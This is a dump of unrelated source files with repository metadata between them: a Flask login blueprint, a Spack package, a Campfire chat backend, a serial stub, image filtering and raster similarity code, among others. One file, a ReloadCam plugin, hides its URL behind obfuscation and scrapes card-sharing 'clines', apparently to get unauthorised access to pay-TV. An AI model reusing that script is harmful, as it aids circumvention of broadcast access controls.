#print tmp,i
#print tmp[i],tmp[i+1],tmp[i+2]
BondType, smaller, higher = tmp[i], tmp[i+1],tmp[i+2]
NAtoms = max(NAtoms,int(higher))
if not higher in Bonds:
Bonds[higher] = {}
Bonds[higher][smaller]=BondType
continue
if "END" in s:
inside = False
# Fill data
data = numpy.zeros((NAtoms,NAtoms))
for i in LP:
data[int(i)-1,int(i)-1] = LP[i]
for i in Bonds:
for j in Bonds[i]:
ii = int(i) -1
jj = int(j) -1
data[ii,jj] = BondTypes[Bonds[i][j]]
data[jj,ii] = data[ii,jj]
ResStr = bondM(NAtoms,symbols=[],data=data)
if 'name' in props:
ResStr.name = props['name']
if 'symbols' in props:
ResStr.applyStringSymbols(props['symbols'])
if 'weight' in props:
ResStr.wg = float(props['weight'])
allStructs.append(ResStr)
self.structures = allStructs
if __name__ == "__main__":
DebugLevel = logging.DEBUG
logging.basicConfig(level=DebugLevel)
from Settings import Settings
Top.settings = Settings(FromConfigFile = True)
f = NRT()
f.file = sys.argv[1]
f.parse()
print f
|
mit
| 3,443,818,888,662,613,500 | 28.625 | 117 | 0.438737 | false | 3.880353 | false | false | false |
ser/topitup
|
login_bp.py
|
1
|
3595
|
# Flask modules
from flask import (
Blueprint,
render_template,
redirect,
url_for,
request,
flash,
g
)
# FLask Login
from flask_login import (
login_user,
logout_user,
current_user
)
# WTForms
from flask_wtf import Form, RecaptchaField
from wtforms import StringField, SubmitField, PasswordField, BooleanField
from wtforms.validators import DataRequired
# Import password / encryption helper tools
# AVOID flask-bcrypt extension, it does not work with python 3.x
import bcrypt
# our own modules
from topitup import db
from nav import (
nav,
top_nav
)
# Let's start!
login_bp = Blueprint('login_bp', __name__)
# Structure of User data located in phpBB
class User(db.Model):
__tablename__ = "phpbb_users"
id = db.Column('user_id', db.Integer, primary_key=True)
username = db.Column('username_alias', db.String(63),
unique=True, index=True)
password = db.Column('user_password', db.String(255))
email = db.Column('user_email', db.String(100), unique=True, index=True)
posts = db.Column('user_posts', db.Integer)
avatar = db.Column('user_avatar', db.String(255))
neuro = db.Column('neuro', db.Numeric(12, 2))
def __init__(self, username, password, email, posts, avatar, neuro):
self.username = username
self.password = password
self.email = email
self.posts = posts
self.avatar = avatar
self.neuro = neuro
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
def __repr__(self):
return '<User %r>' % (self.username)
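# Added note: the model above maps onto an existing phpBB users table, so no new
# schema is created here; user_password is expected to hold a bcrypt hash, which
# is what the login view below verifies with bcrypt.hashpw().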
# Login Form
class LoginForm(Form):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember me')
recaptcha = RecaptchaField('Spam protection')
submit = SubmitField("Log me in")
@login_bp.before_request
def before_request():
try:
g.user = current_user.username.decode('utf-8')
g.email = current_user.email.decode('utf-8')
# amount of Credits in user's account
g.credits = current_user.neuro
g.user_id = current_user.id
except:
g.user = None
g.credits = None
nav.register_element('top_nav', top_nav(g.user, g.credits))
@login_bp.route('/login', methods=('GET', 'POST'))
def index():
form = LoginForm()
if form.validate_on_submit():
username = request.form['username']
password = request.form['password']
password = password.encode('utf-8') # required by bcrypt
remember_me = False
if 'remember_me' in request.form:
remember_me = True
try:
sql_user_query = User.query.filter_by(username=username).first()
pwhash = sql_user_query.password.decode('utf-8')
pwhash = pwhash.encode('utf-8') # required by bcrypt
userid = sql_user_query.id
if userid and bcrypt.hashpw(password, pwhash) == pwhash:
login_user(sql_user_query, remember=remember_me)
flash('Logged in successfully', 'info')
return redirect('/')
except:
flash('Username or Password is invalid', 'error')
return redirect('/login')
return render_template('login.html', form=form)
@login_bp.route('/logout')
def logout():
logout_user()
return redirect(url_for('frontend.index'))
|
agpl-3.0
| 2,974,913,591,940,286,500 | 26.234848 | 76 | 0.624478 | false | 3.71001 | false | false | false |
lgarren/spack
|
var/spack/repos/builtin/packages/eccodes/package.py
|
1
|
4223
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
#
from spack import *
class Eccodes(CMakePackage):
"""ecCodes is a package developed by ECMWF for processing meteorological
data in GRIB (1/2), BUFR (3/4) and GTS header formats."""
homepage = "https://software.ecmwf.int/wiki/display/ECC/ecCodes+Home"
url = "https://software.ecmwf.int/wiki/download/attachments/45757960/eccodes-2.2.0-Source.tar.gz?api=v2"
list_url = "https://software.ecmwf.int/wiki/display/ECC/Releases"
version('2.5.0', '5a7e92c58418d855082fa573efd352aa')
version('2.2.0', 'b27e6f0a3eea5b92dac37372e4c45a62')
variant('netcdf', default=False,
description='Enable GRIB to NetCDF conversion tool')
variant('jp2k', default='openjpeg', values=('openjpeg', 'jasper', 'none'),
description='Specify JPEG2000 decoding/encoding backend')
variant('png', default=False,
description='Enable PNG support for decoding/encoding')
variant('aec', default=False,
description='Enable Adaptive Entropy Coding for decoding/encoding')
variant('pthreads', default=False,
description='Enable POSIX threads')
variant('openmp', default=False,
description='Enable OpenMP threads')
variant('memfs', default=False,
description='Enable memory based access to definitions/samples')
variant('python', default=False,
description='Enable the Python interface')
variant('fortran', default=True, description='Enable the Fortran support')
variant('build_type', default='RelWithDebInfo',
description='The build type to build',
values=('Debug', 'Release', 'RelWithDebInfo', 'Production'))
depends_on('netcdf', when='+netcdf')
depends_on('openjpeg', when='jp2k=openjpeg')
depends_on('jasper', when='jp2k=jasper')
depends_on('libpng', when='+png')
depends_on('libaec', when='+aec')
depends_on('python@:2', when='+python')
depends_on('py-numpy', when='+python', type=('build', 'run'))
extends('python', when='+python')
conflicts('+openmp', when='+pthreads',
msg='Cannot enable both POSIX threads and OMP')
# The following enforces linking against the specified JPEG2000 backend.
patch('enable_only_openjpeg.patch', when='jp2k=openjpeg')
patch('enable_only_jasper.patch', when='jp2k=jasper')
def cmake_args(self):
variants = ['+netcdf', '+png', '+aec', '+pthreads',
'+openmp', '+memfs', '+python', '+fortran']
options = ['NETCDF', 'PNG', 'AEC', 'ECCODES_THREADS',
'ECCODES_OMP_THREADS', 'MEMFS', 'PYTHON', 'FORTRAN']
args = map(lambda var, opt:
"-DENABLE_%s=%s" %
(opt, 'ON' if var in self.spec else 'OFF'),
variants,
options)
if self.spec.variants['jp2k'].value == 'none':
args.append('-DENABLE_JPG=OFF')
else:
args.append('-DENABLE_JPG=ON')
return args
|
lgpl-2.1
| 7,285,572,141,602,078,000 | 43.925532 | 113 | 0.636514 | false | 3.79425 | false | false | false |
DaggerES/ReloadCam
|
DELETED_ReloadCam_Server_Kacsat.py
|
1
|
1301
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Automatic cline refresher
# Created by Dagger - https://github.com/gavazquez
import ReloadCam_Main, ReloadCam_Helper
def GetVersion():
return 3
#Filename must start with Server, classname and argument must be the same!
class Kacsat(ReloadCam_Main.Server):
def GetUrl(self):
        # Put a breakpoint here if you want to see the real URL ;)
#http://kac-sat.noip.me/index.php
realUrl = ReloadCam_Helper.Decrypt("maanpH1wfN3Gz5zUxaVgoaOssXvfypvYz8iWqmGkq7E=")
return realUrl
def GetClines(self):
print "Now getting Kacsat clines!"
kacsatClines = []
kacsatClines.append(self.__GetKacsatCline())
kacsatClines = filter(None, kacsatClines)
if len(kacsatClines) == 0: print "No Kacsat lines retrieved"
return kacsatClines
def __GetKacsatCline(self):
values= {
'user': ReloadCam_Helper.GetMyIP(),
'pass': 'hack-sat.net',
'submit':'Active+User%21'
}
htmlCode = ReloadCam_Helper.GetPostHtmlCode(values, None, self.GetUrl())
cline = ReloadCam_Helper.FindStandardClineInText(htmlCode)
if cline != None and ReloadCam_Helper.TestCline(cline):
return cline
return None
|
gpl-3.0
| 1,889,748,658,797,407,500 | 30.731707 | 90 | 0.652575 | false | 3.142512 | false | false | false |
yunify/qingcloud-cli
|
qingcloud/cli/iaas_client/actions/lb/modify_loadbalancer_backend_attributes.py
|
1
|
2590
|
# =========================================================================
# Copyright 2012-present Yunify, Inc.
# -------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from qingcloud.cli.iaas_client.actions.base import BaseAction
class ModifyLoadBalancerBackendAttributesAction(BaseAction):
action = 'ModifyLoadBalancerBackendAttributes'
command = 'modify-loadbalancer-backend-attributes'
usage = '%(prog)s -b <lb_backend> [-p <port> -w <weight> -f <conf_file>]'
description = 'Modify load balancer backend attributes.'
@classmethod
def add_ext_arguments(cls, parser):
parser.add_argument('-b', '--lb_backend', dest='lb_backend',
action='store', type=str, default='',
help='the ID of load balancer backend.')
parser.add_argument('-p', '--port', dest='port',
action='store', type=int, default=None,
help='the backend port.')
parser.add_argument('-w', '--weight', dest='weight',
action='store', type=int, default=None,
help='the backend weight, valid value is from 1 to 100.')
parser.add_argument('--disabled', dest='disabled',
action='store', type=int, default=None,
help='disable this backend or not, 0: enable, 1: disable.')
parser.add_argument('-N', '--name', dest='name',
action='store', type=str, default=None,
help='new backend name')
@classmethod
def build_directive(cls, options):
if not options.lb_backend:
print('error: backend should be specified')
return None
return {
'loadbalancer_backend': options.lb_backend,
'loadbalancer_backend_name': options.name,
'port': options.port,
'weight': options.weight,
'disabled': options.disabled,
}
|
apache-2.0
| -2,008,896,815,739,194,600 | 41.459016 | 77 | 0.57027 | false | 4.64991 | false | false | false |
mbuesch/pyprofibus
|
stublibs/serial.py
|
1
|
2414
|
from pyprofibus.compat import *
import time
PARITY_EVEN = "E"
PARITY_ODD = "O"
STOPBITS_ONE = 1
STOPBITS_TWO = 2
class SerialException(Exception):
pass
class Serial(object):
def __init__(self):
self.__isMicropython = isMicropython
self.port = "/dev/ttyS0"
self.__portNum = None
self.baudrate = 9600
self.bytesize = 8
self.parity = PARITY_EVEN
self.stopbits = STOPBITS_ONE
self.timeout = 0
self.xonxoff = False
self.rtscts = False
self.dsrdtr = False
self.__lowlevel = None
def open(self):
if self.__isMicropython:
port = self.port
for sub in ("/dev/ttyS", "/dev/ttyUSB", "/dev/ttyACM", "COM", "UART", ):
port = port.replace(sub, "")
try:
self.__portNum = int(port.strip())
except ValueError:
raise SerialException("Invalid port: %s" % self.port)
try:
import machine
self.__lowlevel = machine.UART(
self.__portNum,
self.baudrate,
self.bytesize,
0 if self.parity == PARITY_EVEN else 1,
1 if self.stopbits == STOPBITS_ONE else 2)
print("Opened machine.UART(%d)" % self.__portNum)
except Exception as e:
raise SerialException("UART%d: Failed to open:\n%s" % (
self.__portNum, str(e)))
return
raise NotImplementedError
def close(self):
if self.__isMicropython:
try:
if self.__lowlevel is not None:
self.__lowlevel.deinit()
self.__lowlevel = None
print("Closed machine.UART(%d)" % self.__portNum)
except Exception as e:
raise SerialException("UART%d: Failed to close:\n%s" % (
self.__portNum, str(e)))
return
raise NotImplementedError
def write(self, data):
if self.__isMicropython:
try:
self.__lowlevel.write(data)
except Exception as e:
raise SerialException("UART%d write(%d bytes) failed: %s" % (
self.__portNum, len(data), str(e)))
return
raise NotImplementedError
def read(self, size=1):
if self.__isMicropython:
try:
data = self.__lowlevel.read(size)
if data is None:
return b""
return data
except Exception as e:
raise SerialException("UART%d read(%d bytes) failed: %s" % (
self.__portNum, size, str(e)))
raise NotImplementedError
def flushInput(self):
if self.__isMicropython:
while self.__lowlevel.any():
self.__lowlevel.read()
return
raise NotImplementedError
def flushOutput(self):
if self.__isMicropython:
time.sleep(0.01)
return
raise NotImplementedError
|
gpl-2.0
| 8,178,868,719,447,884,000 | 23.886598 | 75 | 0.652444 | false | 2.976572 | false | false | false |
bolshoibooze/err
|
errbot/backends/campfire.py
|
1
|
4381
|
import logging
import sys
from errbot.backends.base import Message, build_message
from errbot.errBot import ErrBot
from threading import Condition
log = logging.getLogger(__name__)
try:
import pyfire
except ImportError:
log.exception("Could not start the campfire backend")
log.fatal("""
If you intend to use the campfire backend please install pyfire:
pip install pyfire
""")
sys.exit(-1)
class CampfireConnection(pyfire.Campfire):
    rooms = {}  # keep track of joined rooms so we can send messages directly to them
def join_room(self, name, msg_callback, error_callback):
room = self.get_room_by_name(name)
room.join()
stream = room.get_stream(error_callback=error_callback)
stream.attach(msg_callback).start()
self.rooms[name] = (room, stream)
ENCODING_INPUT = sys.stdin.encoding
class CampfireIdentifier(object):
def __init__(self, user):
self._user = user # it is just one room for the moment
@property
def user(self):
return self._user
class CampfireBackend(ErrBot):
exit_lock = Condition()
def __init__(self, config):
super(CampfireBackend, self).__init__(config)
identity = config.BOT_IDENTITY
self.conn = None
self.subdomain = identity['subdomain']
self.username = identity['username']
self.password = identity['password']
        if not hasattr(config, 'CHATROOM_PRESENCE') or len(config.CHATROOM_PRESENCE) < 1:
raise Exception('Your bot needs to join at least one room, please set'
' CHATROOM_PRESENCE with at least a room in your config')
self.chatroom = config.CHATROOM_PRESENCE[0]
self.room = None
self.ssl = identity['ssl'] if 'ssl' in identity else True
self.bot_identifier = None
def send_message(self, mess):
super(CampfireBackend, self).send_message(mess)
self.room.speak(mess.body) # Basic text support for the moment
def serve_forever(self):
self.exit_lock.acquire()
self.connect() # be sure we are "connected" before the first command
        self.connect_callback()  # notify that the connection occurred
try:
log.info("Campfire connected.")
self.exit_lock.wait()
except KeyboardInterrupt:
pass
finally:
self.exit_lock.release()
self.disconnect_callback()
self.shutdown()
def connect(self):
if not self.conn:
self.conn = CampfireConnection(self.subdomain, self.username, self.password, self.ssl)
self.bot_identifier = self.build_identifier(self.username)
            self.room = self.conn.get_room_by_name(self.chatroom)
# put us by default in the first room
# resource emulates the XMPP behavior in chatrooms
return self.conn
def build_message(self, text):
return Message(text, type_='groupchat') # it is always a groupchat in campfire
def shutdown(self):
super(CampfireBackend, self).shutdown()
def msg_callback(self, message):
log.debug('Incoming message [%s]' % message)
user = ""
if message.user:
user = message.user.name
if message.is_text():
msg = Message(message.body, type_='groupchat') # it is always a groupchat in campfire
msg.frm = CampfireIdentifier(user)
msg.to = self.bot_identifier # assume it is for me
self.callback_message(msg)
def error_callback(self, error, room):
log.error("Stream STOPPED due to ERROR: %s in room %s" % (error, room))
self.exit_lock.acquire()
self.exit_lock.notify()
self.exit_lock.release()
def join_room(self, room, username=None, password=None):
self.conn.join_room(room, self.msg_callback, self.error_callback)
def build_message(self, text):
return build_message(text, Message)
def build_identifier(self, strrep):
return CampfireIdentifier(strrep)
def send_simple_reply(self, mess, text, private=False):
"""Total hack to avoid stripping of rooms"""
self.send_message(self.build_reply(mess, text, True))
@property
def mode(self):
return 'campfire'
def groupchat_reply_format(self):
return '@{0} {1}'
|
gpl-3.0
| -7,363,828,428,747,781,000 | 32.7 | 98 | 0.632276 | false | 3.897687 | true | false | false |
EOOOL/flaskq
|
app/api_1_0/comments.py
|
1
|
2405
|
from flask import jsonify, request, g, url_for, current_app
from .. import db
from ..models import Post, Permission, Comment
from . import api
from .decorators import permission_required
@api.route('/comments/')
def get_comments():
page = request.args.get('page', 1, type=int)
pagination = Comment.query.order_by(Comment.timestamp.desc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_comments', page=page-1, _external=True)
next = None
if pagination.has_next:
next = url_for('api.get_comments', page=page+1, _external=True)
return jsonify({
'comments': [comment.to_json() for comment in comments],
'prev': prev,
'next': next,
'count': pagination.total
})
@api.route('/comments/<int:id>')
def get_comment(id):
comment = Comment.query.get_or_404(id)
return jsonify(comment.to_json())
@api.route('/posts/<int:id>/comments/')
def get_post_comments(id):
post = Post.query.get_or_404(id)
page = request.args.get('page', 1, type=int)
pagination = post.comments.order_by(Comment.timestamp.asc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_post_comments', id=id, page=page-1,
_external=True)
next = None
if pagination.has_next:
next = url_for('api.get_post_comments', id=id, page=page+1,
_external=True)
return jsonify({
'comments': [comment.to_json() for comment in comments],
'prev': prev,
'next': next,
'count': pagination.total
})
@api.route('/posts/<int:id>/comments/', methods=['POST'])
@permission_required(Permission.COMMENT)
def new_post_comment(id):
post = Post.query.get_or_404(id)
comment = Comment.from_json(request.json)
comment.author = g.current_user
comment.post = post
db.session.add(comment)
db.session.commit()
return jsonify(comment.to_json()), 201, \
{'Location': url_for('api.get_comment', id=comment.id,
_external=True)}
|
mit
| 1,175,486,497,100,385,800 | 32.357143 | 75 | 0.607484 | false | 3.526393 | false | false | false |
secnot/uva-onlinejudge-solutions
|
10004 - Bicoloring/main.py
|
1
|
1734
|
import sys
from collections import deque
def load_num():
num_str = sys.stdin.readline()
if num_str == '\n' or num_str=='':
return None
return list(map(int, num_str.rstrip().split()))
def load_graph():
"""Load graph into its adjacency list"""
vertices = load_num()[0]
# Check it is a valid graph and not the end of the file
if vertices==0:
return None
# Load each edge an construct adjcency list
edges = load_num()[0]
adjList = [list() for v in range(vertices)]
for i in range(edges):
s, e = load_num()
adjList[s].append(e)
adjList[e].append(s)
return adjList
def is_bicolored(adjList):
"""Use BFS, when the edges of a vertex are processed:
* If the vertex found is new assign a color opposite to current.
* If the vertex was already processed and has same color to current
the graph is not bicolored
"""
vertices = len(adjList)
discovered = [False for x in range(vertices)]
processed = [False for x in range(vertices)]
color = [-1 for x in range(vertices)]
q = deque([0])
color[0] = 0
while q:
v = q.popleft()
processed[v] = True
for n in adjList[v]:
if not discovered[n]:
discovered[n] = True
color[n] = 0 if color[v] else 1
q.append(n)
elif color[n]==color[v]:
return False
return True
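# Illustrative sketch, not part of the original solution: is_bicolored() only
# needs an adjacency list, so tiny hand-built graphs can exercise it. The
# graphs below are hypothetical examples.
def _demo_is_bicolored():
    square = [[1, 3], [0, 2], [1, 3], [0, 2]]   # even cycle -> bicolorable
    triangle = [[1, 2], [0, 2], [0, 1]]         # odd cycle -> not bicolorable
    return is_bicolored(square), is_bicolored(triangle)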
if __name__ == '__main__':
while True:
adj = load_graph()
if not adj:
break
if is_bicolored(adj):
print("BICOLORABLE.")
else:
print("NOT BICOLORABLE.")
exit(0)
|
mit
| -2,551,883,087,197,521,400 | 20.949367 | 76 | 0.544983 | false | 3.802632 | false | false | false |
beremaran/cbu-cse3113
|
hw07.py
|
1
|
2388
|
#!/usr/bin/env python
import argparse
import numpy as np
from PIL import Image
'''
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
'''
Berke Emrecan Arslan <[email protected]>
140315025
Faculty of Engineering, Computer Science & Engineering
Manisa Celal Bayar University
Taken from;
https://github.com/beremaran/cbu-cse3113
'''
def im_load(img_path):
im = Image.open(img_path)
im = im.convert('L')
return np.asarray(im, dtype=np.uint8)
def im_center(im):
return np.asarray(im.shape) / 2
def im_r(im, coordinates=(0, 0)):
return np.linalg.norm(im_center(im) - coordinates)
def im_r_max(im):
return im_r(im, np.zeros((2,)))
def im_filter(im, filter_type, filter_gain):
r = im_r_max(im) * filter_gain
center = im_center(im)
y, x = np.ogrid[:im.shape[0], :im.shape[1]]
k = 1 if filter_type == "lowpass" else -1
return -1 * k * np.sqrt((y - center[0]) ** 2 + (x - center[1]) ** 2) >= r * k * -1
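# Illustrative sketch, not part of the original submission: im_filter() returns
# a boolean mask selecting frequencies inside (lowpass) or outside (highpass) a
# circle whose radius is filter_gain times the maximum distance from the image
# centre. The array size below is hypothetical.
def _demo_im_filter():
    blank = np.zeros((8, 8), dtype=np.uint8)
    low_mask = im_filter(blank, "lowpass", 0.5)    # True near the centre
    high_mask = im_filter(blank, "highpass", 0.5)  # True away from the centre
    return low_mask, high_mask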
def run(img_path, filter_type="lowpass", filter_gain=0.1):
im = im_load(img_path)
f = np.fft.fft2(im)
f = np.fft.fftshift(f)
f[~im_filter(f, filter_type, filter_gain)] = 1
f = np.fft.ifftshift(f)
f = np.fft.ifft2(f)
f = abs(f)
Image.fromarray(f.astype(np.uint8)).save("140315025HW07.png", "PNG")
if __name__ == "__main__":
argparser = argparse.ArgumentParser("140315025HW07.py", description="Low-pass or high-pass filtering for images")
argparser.add_argument("image_path", help="Image to be filtered")
argparser.add_argument("filter_type", choices=["lowpass", "highpass"], help="Filter type")
argparser.add_argument("gain", type=float, help="Filter's gain")
args = argparser.parse_args()
run(args.image_path, args.filter_type, args.gain)
|
gpl-3.0
| -3,285,391,032,930,099,700 | 27.771084 | 117 | 0.664154 | false | 3.15873 | false | false | false |
VUEG/bdes_to
|
src/03_post_processing/similarity.py
|
1
|
18175
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Functions and utilities comparing raster and vector similarities.
Module can be used alone or as part of Snakemake workflow.
"""
import logging
import rasterio
import geopandas as gpd
import pandas as pd
import numpy as np
import numpy.ma as ma
from importlib.machinery import SourceFileLoader
from scipy.spatial.distance import jaccard
from scipy.stats import kendalltau
from timeit import default_timer as timer
utils = SourceFileLoader("lib.utils", "src/00_lib/utils.py").load_module()
def compute_jaccard(x, y, x_min=0.0, x_max=1.0, y_min=0.0, y_max=1.0,
warn_uneven=True, limit_tolerance=4, disable_checks=False):
"""Calculate the Jaccard index (Jaccard similarity coefficient).
The Jaccard coefficient measures similarity between sample sets, and is
defined as the size of the intersection divided by the size of the union of
the sample sets. The Jaccard coefficient can be calculated for a subset of
rasters provided by using the threshold argument.
Min and max values must be provided for both RasterLayer objects x
and y. Method can be used with RasterLayers of any value range, but
the defaults [0.0, 1.0] are geared towards comparing Zonation rank priority
rasters. Limits provided are inclusive.
:param x ndarray object.
:param y ndarray object.
:param x_min Numeric minimum threshold value for x to be used
(default 0.0).
:param x_max Numeric maximum threshold value for x to be used
(default 1.0).
:param y_min Numeric minimum threshold value for y to be used
(default 0.0).
:param y_max Numeric maximum threshold value for y to be used
(default 1.0).
:param warn_uneven Boolean indicating whether a warning is raised if the
compared raster coverages are very (>20x) uneven.
:param limit_tolerance integer values that defines to which precision x and
y limits are rounded to. This helps e.g. with values
that close to 0 but not quite 0 (default: 4, i.e.
round(x, 4)).
:param disable_checks boolean indicating if the input limit values are
checked against the actual raster values in x and y.
:return numeric value in [0, 1].
"""
if not disable_checks:
assert x_min >= np.round(np.min(x), limit_tolerance), "Min threshold smaller than computed min of x"
assert x_max <= np.round(np.max(x), limit_tolerance), "Max threshold greater than computed max of x"
        assert x_min < x_max, "Min threshold for x must be smaller than max threshold"
assert y_min >= np.round(np.min(y), limit_tolerance), "Min threshold smaller than computed min of y"
assert y_max <= np.round(np.max(y), limit_tolerance), "Max threshold greater than computed max of y"
        assert y_min < y_max, "Min threshold for y must be smaller than max threshold"
# Get the values according to the limits provided
x_bin = (x >= x_min) & (x <= x_max)
y_bin = (y >= y_min) & (y <= y_max)
if warn_uneven:
x_size = np.sum(x_bin)
y_size = np.sum(y_bin)
# Sort from smaller to larger
sizes = np.sort([x_size, y_size])
if sizes[1] / sizes[0] > 20:
print("WARNING: The extents of raster values above the "
"threshhold differ more than 20-fold: Jaccard coefficient " +
"may not be informative.")
# Compute the Jaccard-Needham dissimilarity between two boolean 1-D arrays
# and subtract from 1 to get the Jaccard index
return 1 - jaccard(x_bin.flatten(), y_bin.flatten())
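# Illustrative sketch, not part of the original module: compute_jaccard() only
# needs two ndarrays, so it can be exercised without reading any rasters. The
# values and thresholds below are hypothetical.
def _demo_compute_jaccard():
    x = np.array([[0.9, 0.2], [0.8, 0.1]])
    y = np.array([[0.7, 0.3], [0.9, 0.2]])
    # Compare the cells whose values fall within [0.7, 0.9] in both rasters.
    return compute_jaccard(x, y, x_min=0.7, x_max=0.9, y_min=0.7, y_max=0.9)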
def cross_correlation(input_rasters, verbose=False, logger=None):
""" Calculate Kendall tau rank correlation between all the inpur rasters.
Input rasters are read in as masked arrays and all cells that are NoData
are discarded. This way, only the values of informative cells are passed
on to scipy.stats.kendalltau() which makes things faster. The assumption is
that all rasters exactly match on which cells have values. An intersection
of both rasters' masks is used to define informative cells.
:param input_rasters list of input raster paths.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:return Pandas Dataframe with rank correlation information.
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_correlation')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_rasters) > 1, "More than one input rasters are needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING KENDALL TAU RANK CORRELATIONS **]")
all_correlations = pd.DataFrame({"feature1": [], "feature2": [],
"tau": [], "pvalue": []})
n_rasters = len(input_rasters)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_rasters * n_rasters - n_rasters) / 2)
no_computation = 1
for i in range(0, n_rasters):
raster1 = rasterio.open(input_rasters[i])
raster1_src = raster1.read(1, masked=True)
for j in range(i+1, n_rasters):
raster2 = rasterio.open(input_rasters[j])
raster2_src = raster2.read(1, masked=True)
# Compute the intersection of the masks of both rasters and use
# that as a value mask.
value_mask = raster1_src.mask & raster2_src.mask
# Then set the mask of both raster to the intersection mask
raster1_src.mask = value_mask
raster2_src.mask = value_mask
# Inlude only cells with actual values
raster1_values = ma.compressed(raster1_src)
raster2_values = ma.compressed(raster2_src)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating correlation ".format(prefix) +
"between {} ".format(input_rasters[i]) +
"and {}".format(input_rasters[j])))
# Compute Kendall's tau rank correlation
tau, pvalue = kendalltau(raster1_values, raster2_values)
llogger.debug("Tau: {0} (p-value: {1})".format(tau, pvalue))
correlations = pd.DataFrame({"feature1": [input_rasters[i]],
"feature2": [input_rasters[j]],
"tau": [tau],
"pvalue": [pvalue]})
all_correlations = pd.concat([all_correlations, correlations])
no_computation += 1
all_correlations.index = np.arange(0, len(all_correlations.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_correlations
def cross_jaccard(input_rasters, thresholds, verbose=False, logger=None):
""" Calculate Jaccard coefficients between all the inpur rasters.
This is a utility function that is intented to be used to compare
fractions of the landscape.
:param input_rasters list of input raster paths.
:param thresholds vector of numeric tuples (x_min, x_max, y_min, y_max) values of thresholds.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:param ... additional arguments passed on to jaccard().
:return Pandas Dataframe with Jaccard coefficients between all rasters.
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_jaccard')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_rasters) > 1, "More than one input rasters are needed"
assert len(thresholds) >= 1, "At least one tuple of thresholds is needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING JACCARD INDICES **]")
all_jaccards = pd.DataFrame({"feature1": [], "feature2": [],
"threshold": [], "coef": []})
n_rasters = len(input_rasters)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_rasters * n_rasters - n_rasters) / 2 * len(thresholds))
no_computation = 1
for threshold in thresholds:
if len(threshold) != 4:
llogger.error("Threshold tuple needs 4 values")
            continue
for i in range(0, n_rasters):
x_min, x_max, y_min, y_max = threshold
raster1 = rasterio.open(input_rasters[i])
# To calculate the Jaccard index we are dealing with binary data
# only. Avoid using masked arrays and replace NoData values with
# zeros.
raster1_nodata = raster1.nodata
raster1_src = raster1.read(1)
np.place(raster1_src, np.isclose(raster1_src, raster1_nodata), 0.0)
for j in range(i+1, n_rasters):
raster2 = rasterio.open(input_rasters[j])
raster2_nodata = raster2.nodata
raster2_src = raster2.read(1)
np.place(raster2_src, np.isclose(raster2_src, raster2_nodata),
0.0)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating Jaccard ".format(prefix) +
"index for [{0}, {1}] ".format(x_min, x_max) +
"in {} ".format(input_rasters[i]) +
"and, [{0}, {1}] ".format(y_min, y_max) +
"in {}".format(input_rasters[j])))
coef = compute_jaccard(raster1_src, raster2_src,
x_min=x_min, x_max=x_max,
y_min=y_min, y_max=y_max)
jaccards = pd.DataFrame({"feature1": [input_rasters[i]],
"feature2": [input_rasters[j]],
"threshold": [threshold],
"coef": [coef]})
all_jaccards = pd.concat([all_jaccards, jaccards])
no_computation += 1
